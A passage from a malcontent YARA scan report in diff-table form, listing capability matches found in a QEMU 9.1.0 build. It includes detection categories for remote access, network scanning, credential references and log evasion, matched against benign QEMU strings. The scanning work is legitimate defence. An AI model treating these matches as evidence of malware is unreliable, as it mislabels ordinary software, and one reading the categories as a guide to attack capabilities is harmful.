[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/imx-usb-phy](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fimx-usb-phy&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/msd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fmsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-commo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-commo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-conta](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-conta&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vdpa-dev](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvdpa-dev&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-sc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-sc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-us](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-us&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-vs](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-vs&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-b](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-b&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-c](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-c&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-g](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-g&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-n](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-n&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-p](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-p&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-r](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-r&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-s](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-s&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vmstate-if.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvmstate-if.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-buffer.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-buffer.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-command](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-command&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-file.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-file.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-null.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-null.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-socket.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-socket.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-tls.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-tls.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-websock](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-websock&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/dns-resolver.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fdns-resolver.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/net-listener.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fnet-listener.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/can_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Fcan_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/filter.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Ffilter.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qapi/qmp/qobject.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqapi%2Fqmp%2Fqobject.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bitops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbitops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bswap.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbswap.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/coroutine.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fcoroutine.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/int128.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fint128.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/iov.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fiov.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/lockable.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Flockable.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/main-loop.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fmain-loop.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/range.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frange.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/ratelimit.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fratelimit.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/rcu.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frcu.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/thread-contex](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fthread-contex&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qom/object_interfa](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqom%2Fobject_interfa&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/scsi/pr-manager.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fscsi%2Fpr-manager.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/accel-ops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Faccel-ops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/cryptodev.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fcryptodev.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/event-loop-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fevent-loop-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/host_iommu_](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fhost_iommu_&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/hostmem.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fhostmem.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/iothread.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fiothread.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng-random.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng-random.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm_backend](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm_backend&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/vhost-user-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fvhost-user-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/console.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fconsole.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/dbus-display.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fdbus-display.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/qemu-spice.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fqemu-spice.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/migration/channel-block.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fmigration%2Fchannel-block.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/tcg/i386/tcg-target.c.inc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftcg%2Fi386%2Ftcg-target.c.inc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/trace/control-internal.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftrace%2Fcontrol-internal.h&type=code) | +| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | +| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | +| MEDIUM | [fs/proc/pid_cmdline](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-cmdline.yara#proc_cmdline) | access command-line of other processes | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | +| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | +| MEDIUM | [hw/dev/block_ice](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/block-device.yara#block_devices) | works with block devices | [/dev/block/%u](https://github.com/search?q=%2Fdev%2Fblock%2F%25u&type=code)
[/sys/dev/block](https://github.com/search?q=%2Fsys%2Fdev%2Fblock&type=code) | +| MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [vdagent](https://github.com/search?q=vdagent&type=code) | +| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) | +| MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | exec chdir and socket | [chdir](https://github.com/search?q=chdir&type=code)
[execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) | +| MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping 0x](https://github.com/search?q=ping+0x&type=code) | +| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | +| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code) | +| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | +| MEDIUM | [net/remote_control/vnc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/remote_control/vnc.yara#vnc_user) | vnc user | [VNC_](https://github.com/search?q=VNC_&type=code)
[vnc_password](https://github.com/search?q=vnc_password&type=code) | +| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | +| MEDIUM | [net/tcp/sftp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/sftp.yara#sftp) | Supports sftp (FTP over SSH) | [sftp](https://github.com/search?q=sftp&type=code)
[ssh](https://github.com/search?q=ssh&type=code) | +| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | +| MEDIUM | [net/tun_tap](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tun_tap.yara#tun_tap) | accesses the TUN/TAP device driver | [/dev/net/tun](https://github.com/search?q=%2Fdev%2Fnet%2Ftun&type=code) | +| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [-daemon](https://github.com/search?q=-daemon&type=code)
[daemonize](https://github.com/search?q=daemonize&type=code)
[is_daemon](https://github.com/search?q=is_daemon&type=code)
[os_daemon](https://github.com/search?q=os_daemon&type=code)
[os_set_daemon](https://github.com/search?q=os_set_daemon&type=code)
[qemu_daemon](https://github.com/search?q=qemu_daemon&type=code) | +| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [pid_file](https://github.com/search?q=pid_file&type=code) | +| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [d is not known!!](https://github.com/search?q=d+is+not+known%21%21&type=code) | +| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept_dev](https://github.com/search?q=intercept_dev&type=code)
[intercept_gpio_out](https://github.com/search?q=intercept_gpio_out&type=code)
[intercept_in](https://github.com/search?q=intercept_in&type=code)
[intercept_out](https://github.com/search?q=intercept_out&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | +| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Cannot derive password](https://github.com/search?q=Cannot+derive+password&type=code)
[Could not set password expire time](https://github.com/search?q=Could+not+set+password+expire+time&type=code)
[Invalid password](https://github.com/search?q=Invalid+password&type=code)
[SetPasswordAction_lookup](https://github.com/search?q=SetPasswordAction_lookup&type=code)
[change-vnc-password](https://github.com/search?q=change-vnc-password&type=code)
[enter_expire_password](https://github.com/search?q=enter_expire_password&type=code)
[exit_change_vnc_password](https://github.com/search?q=exit_change_vnc_password&type=code)
[hmp_expire_password](https://github.com/search?q=hmp_expire_password&type=code)
[hmp_set_password](https://github.com/search?q=hmp_set_password&type=code)
[marshal_expire_password](https://github.com/search?q=marshal_expire_password&type=code)
[monitor_read_password](https://github.com/search?q=monitor_read_password&type=code)
[not support password prompting](https://github.com/search?q=not+support+password+prompting&type=code)
[obj_change_vnc_password_arg_members](https://github.com/search?q=obj_change_vnc_password_arg_members&type=code)
[password is expired](https://github.com/search?q=password+is+expired&type=code)
[password is not set](https://github.com/search?q=password+is+not+set&type=code)
[please enable password auth using](https://github.com/search?q=please+enable+password+auth+using&type=code)
[prop_get_passwordid](https://github.com/search?q=prop_get_passwordid&type=code)
[prop_set_passwordid](https://github.com/search?q=prop_set_passwordid&type=code)
[protocol password](https://github.com/search?q=protocol+password&type=code)
[proxy-password-secret](https://github.com/search?q=proxy-password-secret&type=code)
[qapi_free_ExpirePasswordOptionsVnc](https://github.com/search?q=qapi_free_ExpirePasswordOptionsVnc&type=code)
[qapi_free_SetPasswordOptionsVnc](https://github.com/search?q=qapi_free_SetPasswordOptionsVnc&type=code)
[qmp_change_vnc_password](https://github.com/search?q=qmp_change_vnc_password&type=code)
[qmp_enter_set_password](https://github.com/search?q=qmp_enter_set_password&type=code)
[qmp_exit_expire_password](https://github.com/search?q=qmp_exit_expire_password&type=code)
[qmp_exit_set_password](https://github.com/search?q=qmp_exit_set_password&type=code)
[qmp_expire_password](https://github.com/search?q=qmp_expire_password&type=code)
[qmp_marshal_set_password](https://github.com/search?q=qmp_marshal_set_password&type=code)
[qmp_set_password](https://github.com/search?q=qmp_set_password&type=code)
[that match this password](https://github.com/search?q=that+match+this+password&type=code)
[type_ExpirePasswordOptionsVnc](https://github.com/search?q=type_ExpirePasswordOptionsVnc&type=code)
[type_ExpirePasswordOptions_members](https://github.com/search?q=type_ExpirePasswordOptions_members&type=code)
[visit_type_SetPasswordAction](https://github.com/search?q=visit_type_SetPasswordAction&type=code)
[visit_type_SetPasswordOptionsVnc](https://github.com/search?q=visit_type_SetPasswordOptionsVnc&type=code)
[visit_type_SetPasswordOptions_members](https://github.com/search?q=visit_type_SetPasswordOptions_members&type=code)
[vnc password expire-time](https://github.com/search?q=vnc+password+expire-time&type=code)
[vnc_display_password](https://github.com/search?q=vnc_display_password&type=code) | +| LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [private_key](https://github.com/search?q=private_key&type=code) | +| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | +| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code) | +| LOW | [data/compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | +| LOW | [data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | +| LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [ZSTD_decompressStream](https://github.com/search?q=ZSTD_decompressStream&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | +| LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | +| LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | +| LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | +| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | +| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | +| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Could not load plugin](https://github.com/search?q=Could+not+load+plugin&type=code)
[Plugin options](https://github.com/search?q=Plugin+options&type=code)
[cap_disas_plugin](https://github.com/search?q=cap_disas_plugin&type=code)
[gen_plugin_u64_ptr](https://github.com/search?q=gen_plugin_u64_ptr&type=code)
[load a plugin](https://github.com/search?q=load+a+plugin&type=code)
[op_plugin](https://github.com/search?q=op_plugin&type=code)
[output from TCG plugins](https://github.com/search?q=output+from+TCG+plugins&type=code)
[plugin file](https://github.com/search?q=plugin+file&type=code)
[plugin_add_dyn_cb_arr](https://github.com/search?q=plugin_add_dyn_cb_arr&type=code)
[plugin_atexit_cb](https://github.com/search?q=plugin_atexit_cb&type=code)
